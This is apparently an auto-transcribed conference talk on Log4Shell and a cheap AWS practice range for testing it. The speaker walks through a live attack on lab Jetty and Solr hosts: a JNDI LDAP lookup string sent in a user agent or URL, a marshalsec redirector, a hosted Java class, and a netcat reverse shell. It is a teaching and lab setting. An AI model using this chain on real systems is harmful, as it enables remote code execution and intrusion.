A Log4Shell Practice Exploitation Range in the Cloud

for my next trick I'll make this 2011 MacBook stay connected to the projector for the entire presentation uh welcome uh thank you for coming the the title of this discussion is log for Shell exploitation and Cloud range um you've probably read the description but we'll go over what this is going to be about um I'm going to talk about what is log4j what was log4 shell besides something that disrupted a lot of folks uh holidays I'm going to talk about who cares about it we'll do some demonstrations with exploitation uh and then I'll talk about how the range is built that helps demonstrate this exploitation what I hope is that you'll take away an understanding of what the

log for Shell vulnerability is why it exists and that you'll understand this simple quick and cheap way to set up a test exploitation range in the cloud so that you might you know the next time a more relevant vulnerability comes out be in a good spot to test out exploits against it try out all the stuff you're seeing on infosec Twitter easily and quickly but first um why uh why should you care about what I'm saying uh hopefully you're interested in it but if not uh uh well just leave um well you're you all stayed I appreciate that my name is uh Carl sikandik again uh call sign Rosie I'm in the Air Force active duty so we have weird things like

call signs just like in Top Gun you know there I was inverted uh I'm stationed here in town I've got a Bachelor's in double e a master's in computer science and I've got experience with cyber ranges I've used that term a little bit range what does that mean it's maybe a little bit more common in in the military but it's also not totally uncommon I was able to pull this this dictionary definition up it's a controlled interactive technology environment where up and coming cyber Security Professionals can learn how to detect and mitigate cyber attacks using the same kind of equipment they will have on the job so you can run a bunch of VMS in it you can test it out a lot

of folks have known this as a home lab in the past typically that involves like buying a server off eBay setting it up in your basement my wife would kill me if the basement sounded like an aircraft every time she went down there and it's San Antonio so we don't have basements anyway um so I've I've been doing this kind of stuff on the cloud uh and and that terminology you know maybe you call this a cloud range or a Home range in the cloud a home lab in the cloud I'm just going to call it a range all right so again here's here's what we're gonna do uh first of all what is log for Shell uh in December 2021 this

came out I think it was on a Friday and so folks had just left the office and they were probably driving home they I'm sure that they stopped they pulled over they looked at their news feed because their phone was exploding and they saw that this brand new vulnerability came out some people probably just turned right around and went back into the office and other people probably turned off their phone and pretended like they were in Bermuda uh but a little bit in more details log4 shell is a remote code execution vulnerability in in any in any application logging using the right versions of uh log 4J to libraries specifically it's got to be logging user

inputs so there's there are ways to use that log4j2 library that don't log user inputs and those would not have really been vulnerable to this you got to take that user input log it log4j2 is a very popular logging framework within Java it's in all kinds of different applications as we'll see in a second and and to drill down a little bit if you're not familiar with what remote code execution means it says just about the worst type of vulnerability you can get it means that the attacker can execute any any code that they want on your computer so some some common examples from today and yesterday are ransomware key loggers where they want to steal all your

passwords or maybe they just want to generate a little bit of money on the side with a cryptocurrency minor but it can be literally anything the examples that we're going to do we're just going to get a shell running a command line prompt running on the attacked computer and we're going to send that command line prompt back to us as the attacker so we could take more actions but it can be literally anything you imagine you just write a little Java code and you're you're running the root cause of this again is that the programmers trusted user input um this this goes back to a feature we'll talk about the feature in just a second it's a feature in log 4J that is

able to be misused looking in the manual around the time that this vulnerability came out there's even a little note when this feature was added to log4j that you've got it programmers have got to be careful when they use it to avoid logging uh to avoid logging user input blindly so that seems to have just been ignored in a lot of cases or um you know programmers they didn't read the manual surprise so what what is log4j let's step back and talk about what is this logging framework real quick so here we've got an example where a laptop is browsing to a website on a Java on a web server written in Java so it's doing a get

request and we've got the web server logging a little bit of information using this log4j Library specifically here the web server is logging the user agent string if you don't know a user agent string tells us what kind of browser the person's running it can tell us if they're on a mobile device or on a desktop or laptop or something else um it can even tell us what operating system they're running so it's very common to pull in and log those user agent strings it tells you a lot about the people that are visiting your website in this case nothing bad is happening log 4J is just seeing that user agent passing along to disk and writing it out like a happy boy

well let's say you're the programmer of that web server and you want to get a little bit more complicated you want to log in addition to that user agent the version of java that your web server is running in I don't know why you would want to do this but it is a feature of log 4J that you can and so all you got to do is the web server is take that user agent string append a little bit of text dollar sign open brace Java colon version close brace and then when you pass that to log4j and you're using the most common method of logging it's going to replace that dollar sign open brace close brace bit with open jdk

11013 or whatever version of java the web server is running as maybe this is more useful in a non-web server example but this was a feature that was added to open jdk on purpose this text substitution feature it gets a little bit more uh powerful than just substituting in the version uh when you when you get to log for Shell this is a this is a great way of demonstrating that power log4j that that text substitution feature can be used to run code and if if the user was not allowed to submit the code that's running this might be a useful feature in some use case but unfortunately it's it's very commonly misused and thus we get

log for shelf vulnerability so in this case here's here's a malicious user now on the laptop you and me are sitting on this laptop and we're going to give this web server a bad day uh We've replaced the user agent string we've replaced your typical user agent string with uh dollar sign open brace jndi colon ldap colon slash attacker server blah blah blah who who that in the in the back row can you guys see that awesome uh in a little bit the reason I ask is in a little bit we're going to do some demos on the keyboard um that's kind of the more interesting piece I think I made the text big enough

that everyone can see but if not then please just scoot on forward So Okay so we've replaced your typical user agent string with this malicious one now the web server gets it it it tries to log that user agent still and when log4j gets that malicious user agent string the first thing it does is it says oh I need to uh I need to go out to a jndi server speak in this this little bit of ldap jndi protocol and I need to ask it where to get some code from so it makes a connection out to the attacker's server it calls out to that jndi ldap server and it asks hey where where is this

little bit of code named in this case log 4J callback you can call it whatever you want and then the jndi ldap server responds hey here's a web server where you can go pick up this malicious code so that's what attacker colon 8080 is it's it's that jndi ldap server which is a specific weird language responding hey here's a web server where you can download the code so then log 4J says all right now I got my web server I'm going to go there I'm going to download this malicious code it doesn't know it's malicious I'm going to download this code and I'm going to run it so it calls out to attack our web server which is

attacker colon 8080 in this case attacker web server is going to oblige and give it back log4jcallback dot class and then log4js is going to run it and that's going to pop a pop a shell and return it to the attacker in the example case so multiple stages of this attack none of them are very complicated and tooling is already built to allow all of these to happen really easy so what is affected by this vulnerability uh sisa put out a great GitHub site kind of the next day so real real quick where they started taking user input on every server that companies and people reported was vulnerable to this Minecraft if you watched YouTube there

were a lot of videos of people popping Minecraft servers because it included log4j logging and it was very vulnerable elasticsearch and log stash there there are a lot of caveats to that one about its vulnerability but uh that was widely seen as as directly vulnerable to this and it's those two are embedded in a ton of other products so then all those other products that embed elasticsearch and log stash for whatever reason uh were also seen as vulnerable a number of other tools solar and Jetty are the ones that we're going to be using in the demonstration so solar is is not a product I've used before or log4 shell it's an Apache search engine it looks

like something that enterprises might use and Jetty is a web server by jetbrains and it's there's a little a few uh uh caveats to its vulnerability as well but it's it's just a neat web server ghidra the nsa's reverse engineering tool was also vulnerable to this a ton of VMware products uh the solarwinds folks had another bad Christmas although certainly less bad than the year prior and and just a ton of stuff is on that list it used to be a really massive list and now they've broken it out by a b by alphabet so it's easier to browse but you can go there and check out check out the full list see if anything you've

got on there is vulnerable so really is all this stuff really vulnerable well if you're running a jdk version newer than October 2018 there's an environment variable that that automatically makes this a lot more difficult to exploit it seemed like that was the recommended fix at first and then attackers played Cat and Mouse and they found some ways around that uh so then they recommend well set set this uh set this setting in the log 4J configuration log 4J is extremely configurable it's it's really nice in that way it seemed like that was a good fix for a little while but of course attackers seem to find ways around that as well and then elasticsearch the major caveat

to elasticsearch is that for a few years now they've been building elasticsearch with a Java tool that um it's it's it adds a lot of automatic security features I'm not a Java programmer I'm sorry uh but but it's built in a way that disallows jndi execution and so I I've had a couple people tell me that elasticsearch is vulnerable certainly you can get those first stages of callbacks from it I haven't seen anybody actually get remote code execution on elasticsearch so feel free to if you've got a counter demo to that then please let me know I would love to see it uh and I I wouldn't I wouldn't bet on any of these as as solid protections

just just update your stuff uh the the fixes are out now Okay so we've talked we've talked about log 4J we've talked about what log for Shell is we've talked about how it works but there's nothing better than trying it out for ourselves and so over the holidays I had a little time off and I spent the the evenings after my wife and daughter went to bed messing around with us uh and so if uh you know huge thanks to my wife for just ignoring all my BS around this this is just a a love a love thing uh in order to mess around with this vulnerability I set up a range that looks just like this on AWS so there's

there's three computers three ec2 instances that I stood up on on AWS Cali box is running Kali Linux solar is just running Debian and then I've installed solar and Jetty and I can install any other Docker any other service that's got a Docker container associated with it on that Debian box excuse me and we could go further we could install anything we want those are both connected uh they're they're on separate subnets but uh they're connected in the same virtual private Cloud on AWS so they can talk to each other easily through something similar to network routing the only way that either of those can talk to the internet or that the internet can talk to them is through

that jump host there that's run in guacamole on it that's an Apache product that gives you a uh a remote desktop interface to uh VNC remote desktop so it's just a great front end uh and in this demonstration the first thing we're going to do we're going to connect to that guacamole server running on jump host and then we'll be able to demonstrate exploitation from the Cali box across to the solar host so let's let's do that that's the fun part now this is the part where I might screw up this connection but I'm going to try really hard not to so you can't see this but the the code for all this was provided on a on a

GitHub uh on a GitHub repo you can download it there's instructions so you can easily set this up and run it yourself I wrote those instructions mostly as a reminder to me in a year when it's the holidays again and of course no new vulnerabilities were at will be out and I'll want to play with them and I'll forget how to do all this but it one of the things it requires is a domain name from free DNS afraid.org those guys are fantastic and so this one is like log4jrange.lee.mx and guacamole just presents a login uh and this gets set up automatically during provisioning and and configuration so I'll go ahead and log into this I

actually set this up last night uh to hopefully appease the demo Gods we'll see how well that goes it seemed to still be working a little while ago after this part we'll go through redeployment so you can see that all work but on here we've got we've got access to the solar box and we've got access to the Cali box so again this is just a regular Debian uh Debian install with a couple containers running on it when I ran pseudo Docker PS I apologize this text is a little small but but it's running essentially two Docker containers a vulnerable Jetty server which I had to create a custom container for to make it to make it vulnerable

because the default install parameters of jetty are not it is not vulnerable it's just some configuration options that make it vulnerable and then install solar this is the default solar Docker container that you can you can grab from Docker Hub solar is listening on Port 89 83 and Yeti's listening on Port 80. but we don't have to know that we can switch over to our tally box

awesome and uh you know if if we were the attacker all we might know is oh right there all we might know is uh kind of the network layout of of our Target organization and of course we'd know our own IP address but we see our Target organization is uh in the 10 1866 range so we can hop on over to our tally box and we can do like an nmap that's n 10 1866.star and we'll just do a kind of a ping sweep of that whole little little bit of uh of the network and see if there are any open boxes there and then we can scan there's only one only one box so we should get that

one back and while we're doing that let's look at what our IP address is 10 18 225 [Music] thank you

I'm going to go ahead and open a new tab once we get that back we're going to want to um port scan that box more clearly I think it's 163. I'm cheating a little bit because I again I tested this out last night to make sure it's good so we should get in another minute or so a little return here that says it's it's dot 163 that's vulnerable but if we do a port scan against dot 163 just for time we can see SSH HTTP that's going to be that Jetty web server uh and and some BNC and X11 ports are open if if this was a real server that uh VNC might be much more restricted than it is we might

not be able to port scan it and X11 would be would be off limits as well so so some changes you might want to make if you're looking for a little bit more realism but here we're looking for a basic ability to demonstrate uh sorry we're looking for a basic ability to demonstrate this vulnerability so if we just go to that if we just go to that IP address directly and we look at what's on Port 80 we see it's the jetty server and if we go to that solar port 89.83 we're going to see it's solar just as as we would expect from this Cali box so that solar Port didn't show up in in the nmap scan anybody know why

yep it's not in the default range exactly 89.83 is not one of the default ports nmap is going to scan if you were an attacker looking for specifically solar boxes then of of course it would be in your in your Port scanning range and if and where we own the server so we've we've got an easier time you can see here nmap was able to find that one running box on the subnet all right so so we found our Target now from the attacker station uh now we need to set up those different servers that are going to that are going to uh to get us to exploitation and um just because of cheater I've put a bunch of the commands and

everything that you need to do this right into the GitHub repo so we can just go there from the Cali box it's got some information on deploying the range setting it all up it's got all this information here zoom in a little bit here

it's got the the URLs on the solar server that are going to get us execution it's got the URL or uh user agent string on the jetty box that's going to give us exploitation and it's kind of got a step-by-step walkthrough of how to do this so if you remember that first server that we need is that jndi ldap server well as part of provisioning and configuring this range I download some other dude's code to do this this Marshall set guy and and I found out about this by Googling around and finding an awesome Sans tutorial on this so thank you Sans thanks thank you Marshall set guy that that information is is located this and they do a little

bit more of a deep dive especially the Marshall set guy does a good Deep dive into what this protocol is and how it works so just just to demonstrate exploitation though we need to CD into this martial SEC directory and then we need to run the Java server the the jndi server that's going to get us okay so as part of this command you can see it's just executing a jar but we've got to replace this um Cali box uh IP address with what our IP address oh which is 225.8 I'm glad I checked and I screwed that up thank you 1018-225.8 so what this is going to do start up this Marshall sex server it's

going to tell it anybody that's connecting asking for that the address where it can download this malicious code uh give them 1018 255.8 colon 8080 and tell them to download log 4J callback we can name it whatever we want but that's the name we're using for this demonstration okay so now it's listening on Port 1389 on this Cali box now we've got to also stand up that web server so that we can serve our malicious code from from that location so I'm going to do that over here and just to demonstrate this is come on what's going on oh a little bad Network latency this normally moves a little bit faster so a little bad Network latency

okay we're back to moving again okay so uh the the command to start up the python web server is right there you can just copy and paste it Cali's been updated a little bit since I wrote this so now you got to say python3 this is uh if you're not familiar basically the fastest way to start up a web server python3 has a thing that serves files out of your current directory uh just by doing this little command http.server as their module port 8080. okay so now we've got a web server now we've got to write our malicious code so I made this easy just copy and paste this malicious code into a file even easier than that though

I've already when you set this range up the file is already present log4j callback.java and now normally you've got to come in here and replace this IP address with your current IP address since I tested this last night it's already replaced but um it's a little hard to see there so let me zoom in here let's talk about what this malicious code does real quick this is going to create a class log4j callback and it's it's got to be named the same thing as the file name because this is Java but all that class does is is run this little bit of code inside the static block when it gets started up and what that does is uh uses Java Lang

runtime exec function to execute this command netcat is is this NC it's the Swiss army knife for TCP and it's gonna create a TCP connection back to our Cali box on Port 8081 and it's going to execute bash which is the command line on Linux and send any anything it gets from the command line back over that connection and anything it receives it's going to put it right in the command prompt so this is a very common way to shovel a shell back to yourself as the attacker and that's exactly what we're using here it's going to work so we've we've got it all written in our file we we have to compile it and that that code that's in there can

be anything you imagine that's that's Java code it can be directly your key logger if you figure out a way to do that it can mine cryptocurrency whatever you want you can cram it in there compile it and and send it all right so now we've got our our callback here our uh malicious code the last server that we've got to run is the thing that receives that shell when it gets shoveled back to us and so here's a little command that's going to do that for us okay so in this window we've got our jndi server in this window we've got our web server that's going to send the malicious code in response to

the jndi service redirect and in This Server we're going to receive our callback after our malicious code runs so I'm going to pop up one more tab unfortunately the screen space won't let me show them all at the same time or you wouldn't be able to see anything in order to make the actual call now we've got to embed that jndi ldap string in there uh into one of those malicious spots and again those were visible right up at the top so let's let's exploit this Jetty server first so

sorry let's just copy paste that URL in here we've got to replace solar address with our Solar box1018 dot what was it 66.163 let me just verify that real quick

10 18 66 163 uh that that Jetty server is just at Port 80 so the default here is going to work and now we got to cram in this jndi ldap colon slash slash our attacker box 1018225.8 I think and we've got a we've got to tell it which port to go to and the port is visible over here 1389 colon 1389 slash and then I think it's just pound sign log 4J callback but uh I'm pretty forgetful so let me just verify right here no pound sign log 4J call back excellent so now if we use Curl to browse to that website this is this is almost going to work so we can see that curl returned the

website but we can see that we never got an initial call out to our jndi ldap server and that's because uh you also have to escape these braces because this is the Linux command line so just put a backslash in front of your braces it's just a it's like a fascism let's try this again so here we now we can see a ton of stuff was received by our jndi ldap server log4j tried to execute this a bunch of times um we can see that our web server received the redirect request and it served up our class and we can see that we got a connection to our reverse shell home so let's look around

we can see this looks like something who am I I'm a jetty user and so now you could do any kind of post exploitation activities you wanted to on this box the sky's your limit this is a Docker container so a lot of the tools that you might expect to find on just like a regular Linux server are not going to be present but this is this is an exploitation uh test range and so we don't really need to do the poised exploitation now you can use Metasploit to generate a Java interpreter and that'll work great as long as you kind of wrap it in a weird way I think I have instructions on there

you can get a call back from interpreter to to Metasploit it's awesome and then you got your whole post exploitation toolkit everything that was that's part of Metasploit is is available to you then and of course whatever else you want to do you can also do Okay so so we we had success on the jetty box and let's try the solar box real quick uh the URL is almost the same we got to put in the jetty Port 8983 and we got to put in I think it's solar slash cores slash is is one of them I found oh sorry I found a few different spots on the default solar install um that are vulnerable 8093 solar admin

cores solar admin config solar admin collections so we'll do I think I typed that wrong solar admin of course awesome okay so we got we got something back let's see if we got our oh we didn't get a showback I must oh thank you

ah that looks much more like what I'm used to okay so thank you so the the URL is correct on the GitHub site I just typed it wrong live no surprise let's see where we got our connection from you can see this looks like a solar something who am I solar so we're on that solar box now it gave us a call back easy peasy um all right so we've seen exploitation we've we've demonstrated this range the next thing that you're you're probably interested in is how how did this get deployed how can I run this on my own at home using my own AWS account or how can I set up something similar for tomorrow's

vulnerabilities um there's three steps to the deployment first of all create some infrastructure within Amazon web services and we're going to use terraform to do that configure that infrastructure we're going to use ansible to do that and then start those vulnerable services so that you can go in there and exploit them and that happens automatically as a result of ansible I'm going to demonstrate this so I'm logged into My Home Server that I've used to deploy this and we'll talk about the the directory structure here in a minute but this is the exact same thing you'll you'll get from the uh the GitHub there's a terraform directory and an ansible directory those are the most

critical things first we've got to deploy the infrastructure so we'll go into terraform now it's already deployed so let's destroy it terraform destroy I tried to type that wrong so terraform is going to do a little calculation it's gonna it's gonna consider what's deployed currently to AWS and what actually needs to be deployed and uh since we said destroy it's gonna it's gonna destroy it all now this is going to take a couple of minutes and then we'll we'll re-deploy it again and we'll run ansible um but while we do that let's go ahead and look at how this kind of works behind the scenes so let's see if well I'm going to do it

over on the screen here sorry

oh awesome

so again uh the main directories in here are are ansible and terraform the readme and the terraform directory is going to tell you exactly what you've got to run you've got to create some SSH Keys just running these exact commands you run terraform in it and terraform apply and it's going to use the the dot TF files in this directory to configure your your range is anybody familiar with terraform yeah this could be like a whole you know a whole four hour five day talk on how terraform works but it's basically going to cram all these dot TF files together and do the best job of figuring out what that says you want your AWS

infrastructure to look like it's going to start with main.tf because that's where the base of my configuration is written there's nothing special about main.tf uh inside that it's got some variables that describe hey we want to do this on AWS we want to do it within uses two I want to apply a tag to every resource that I set up uh here are the Debian and Cali images Amis that I want to install on on some EC ec2 virtual machines and here are the type of machine that I want to deploy small medium and large all set up in variables so we can refer to them later it's also going to describe some basic subnetting

that we can use in other files uh the the red box the Cali box the blue box that solar box and the administrator box that jump hosts are all described in separate.tf terraform files and as a result of this we want to we want to easily pass this configuration over to ansible so this ansible host TF file is automatically going to use a template to create an ansible host file and to drop it in the right spot where ansible needs it for configuration and then there's a secrets.tf template this is the other thing if you want to deploy this yourself you need to set up it's going to ask for hey what do you want the passwords to be you get to make

them up what's what's your domain on afraid.org and and how do I update the IP address of that domain uh that that's the kind of stuff that you're going to have to put in your own secrets.tf I wouldn't want to deploy that on GitHub all right let's see how this is going so terraform has successfully destroyed so now let's try and terraform apply and right now I'm I'm going to have basically none of this stuff on my AWS infrastructure and terraform is going to go ahead and set all of it up based on this configuration it goes from me spending zero dollars to AWS to me spending about three dollars a day it's pretty cheap range fortunately

and it's going to do that in just a couple of minutes here so after we do that terraform configuration we're going to need to change over to the ansible directory and if you're familiar with ansible at all we're just going to run a Playbook Playbook Dot yaml hopefully I'll have time to demonstrate this real quick but this has a configuration section for each of the different hosts the jump hosts the red host and the Bluehost and I can just tell it which roles I want each of those to inhabit I want my jump host to be running guacamole it needs Docker to do that so I also want it to be a Docker server I want my Kali box to have a

desktop environment and to be running a VNC server and to automatically configure some of that jndi stuff that we talked about jndi server right there and I want my solar host to be running solar and Jetty I also have the ability to set up an elasticsearch host but I wasn't able to get execution there so it's less interesting now none of that is Magic either all of those roles corresponds correspond to a directory in the ansible roles directory and so this is the meat of the ansible configuration you can see there's there's directories that tell ansible how to set up each of those things guacamole solar jndi all that stuff and we could dive in on on how those work if

you're interested it's all documented in code it's all going to work for you feel free to take a look let's see where uh terraform is so so terraform has now deployed the infrastructure you can see that the last thing it's doing is it's telling us the IP addresses in that environment but we don't we don't need to look at that uh because we can just CD dot dot slash ansible and we can run uh Playbook ansible Playbook playbook.yaml terraform has already created the host file for us we're good to go now this is going to take several minutes because installing a graphical user interface on Linux takes takes a little while but it's just going to chug through it's going to

deploy everything and and it's worked three times in a row now it'll We're Not Gonna We're not gonna have time to to see it finish this time but uh it will Okay so we've we've talked about how to deploy we've demonstrated it a little bit the overall cost of this is Tiny it's just it's deploying exactly what it says here in the the cost is less than three dollars a day you don't need to run it for a full day though if you're going to play with it for four hours stand it up play with it and then terraform destroy when you're done um so the the cost is really tiny um this this allows you to stand up

hundreds of servers if you want and play with them for a little while for real cheap or just three we've talked about how all those different components work I've got a link to the code back at the beginning of the slide some of the remaining tools are if this was a real range we might want to be able to observe those attacker actions in real time using security onion and so it would be great to automatically deploy security onion into this VPC and monitor those attacker actions and you could get a feel from both the red and a blue side that's not done in this yet uh maybe maybe to come it would be great to use actual Linux

boxes or real routers deployed to AWS because right now the networking is just using aws's subnets and security groups and those are kind of just a simulation of of what we we might want to simulate in the real world what we might want to see in the real world um and and last up I want to save some time for for questions so I just wanted to say thank you to all these groups afraid.org an amazing DNS provider for free so that made this really easy to demonstrate let's encrypt obviously thanks Sans for letting me steal your stuff uh Jonas alfredson has got an awesome nginx plus let's encrypt Docker container that's made my life a lot

easier including this project uh and thanks Apache software foundation not only did you make log 4J which gave me the impetus for this talk today you also made guacamole which let me let me experiment with it and thanks again to my wife who lets me screw around with this stuff instead of sleeping all right uh any any questions there we go we've got a few minutes for Q a if you have anything just line up right here in the middle I'll give you the mic for that but thank you Carl so far anybody got any questions okay I think we're good then all right thanks thank you everybody [Applause]

just gonna